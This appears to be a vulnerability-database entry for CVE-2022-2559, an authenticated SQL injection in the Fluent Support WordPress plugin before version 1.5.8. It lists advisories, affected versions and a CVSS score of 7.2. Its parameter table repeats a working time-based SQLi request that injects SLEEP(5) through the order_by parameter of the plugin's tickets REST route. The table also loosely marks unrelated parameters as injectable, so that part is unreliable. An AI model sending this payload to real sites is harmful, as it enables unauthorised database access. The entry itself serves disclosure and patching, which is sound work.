CVE-2022-2559

🗓️ 29 Aug 2022 17:15:36Reported by WPScanType

cve🔗 web.nvd.nist.gov📰️ 3 Media mentions👁 59 Views🌐 WEB

The Fluent Support WordPress plugin before 1.5.8 SQL Injection vulnerabilit

Reporter	Title	Published	Views	Family All 12
ATTACKERKB	CVE-2022-2559	29 Aug 202218:15	–	attackerkb
Circl	CVE-2022-2559	29 Aug 202222:34	–	circl
CNNVD	WordPress plugin Fluent Support SQL注入漏洞	29 Aug 202200:00	–	cnnvd
Cvelist	CVE-2022-2559 Fluent Support < 1.5.8 - Admin+ SQLi	29 Aug 202217:15	–	cvelist
EUVD	EUVD-2022-34813	3 Oct 202520:07	–	euvd
NVD	CVE-2022-2559	29 Aug 202218:15	–	nvd
Patchstack	WordPress Fluent Support plugin <= 1.5.7 - Authenticated SQL Injection (SQLi) vulnerability	2 Aug 202200:00	–	patchstack
Prion	Sql injection	29 Aug 202218:15	–	prion
Positive Technologies	PT-2022-17386 · WordPress · Fluent Support	29 Aug 202200:00	–	ptsecurity
RedhatCVE	CVE-2022-2559	22 May 202521:54	–	redhatcve

NVD

Vulners

Node

wpmanageninja fluent_supportRange<1.5.8wordpress

[
  {
    "product": "Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin",
    "vendor": "Unknown",
    "versions": [
      {
        "lessThan": "1.5.8",
        "status": "affected",
        "version": "1.5.8",
        "versionType": "custom"
      }
    ]
  }
]

Source	Link
wpscan	www.wpscan.com/vulnerability/062599ce-c630-487e-bb43-c3b27a62b9ec

Parameter	Position	Path	Description	CWE
rest_route	query param	/?rest_route=/fluent-support/v2/tickets&page=1&per_page=10&order_by=priority`=`priority`%20AND%20(SELECT%209285%20FROM%20(SELECT(SLEEP(5)))BuXj)%20AND%20`priority`=`priority&order_type=ASC&_wpnonce=f8394cb76d	SQL Injection vulnerability via unsanitized parameters in rest_route query leading to potential delay/EXFiltration (sleep-based PoC).	CWE-89
order_by	query param	/?rest_route=/fluent-support/v2/tickets&page=1&per_page=10&order_by=priority`=`priority`%20AND%20(SELECT%209285%20FROM%20(SELECT(SLEEP(5)))BuXj)%20AND%20`priority`=`priority&order_type=ASC&_wpnonce=f8394cb76d	SQL Injection vulnerability via unsanitized parameters in rest_route query leading to potential delay/EXFiltration (sleep-based PoC).	CWE-89
_wpnonce	query param	/?rest_route=/fluent-support/v2/tickets&page=1&per_page=10&order_by=priority`=`priority`%20AND%20(SELECT%209285%20FROM%20(SELECT(SLEEP(5)))BuXj)%20AND%20`priority`=`priority&order_type=ASC&_wpnonce=f8394cb76d	SQL Injection vulnerability via unsanitized parameters in rest_route query leading to potential delay/EXFiltration (sleep-based PoC).	CWE-89
order_type	query param	/?rest_route=/fluent-support/v2/tickets&page=1&per_page=10&order_by=priority`=`priority`%20AND%20(SELECT%209285%20FROM%20(SELECT(SLEEP(5)))BuXj)%20AND%20`priority`=`priority&order_type=ASC&_wpnonce=f8394cb76d	SQL Injection vulnerability via unsanitized parameters in rest_route query leading to potential delay/EXFiltration (sleep-based PoC).	CWE-89
page	query param	/?rest_route=/fluent-support/v2/tickets&page=1&per_page=10&order_by=priority`=`priority`%20AND%20(SELECT%209285%20FROM%20(SELECT(SLEEP(5)))BuXj)%20AND%20`priority`=`priority&order_type=ASC&_wpnonce=f8394cb76d	SQL Injection vulnerability via unsanitized parameters in rest_route query leading to potential delay/EXFiltration (sleep-based PoC).	CWE-89
per_page	query param	/?rest_route=/fluent-support/v2/tickets&page=1&per_page=10&order_by=priority`=`priority`%20AND%20(SELECT%209285%20FROM%20(SELECT(SLEEP(5)))BuXj)%20AND%20`priority`=`priority&order_type=ASC&_wpnonce=f8394cb76d	SQL Injection vulnerability via unsanitized parameters in rest_route query leading to potential delay/EXFiltration (sleep-based PoC).	CWE-89

21 Nov 2024 07:01Current

7.2High risk

Vulners AI Score7.2

CVSS 3.17.2

EPSS0.00566

CWE-89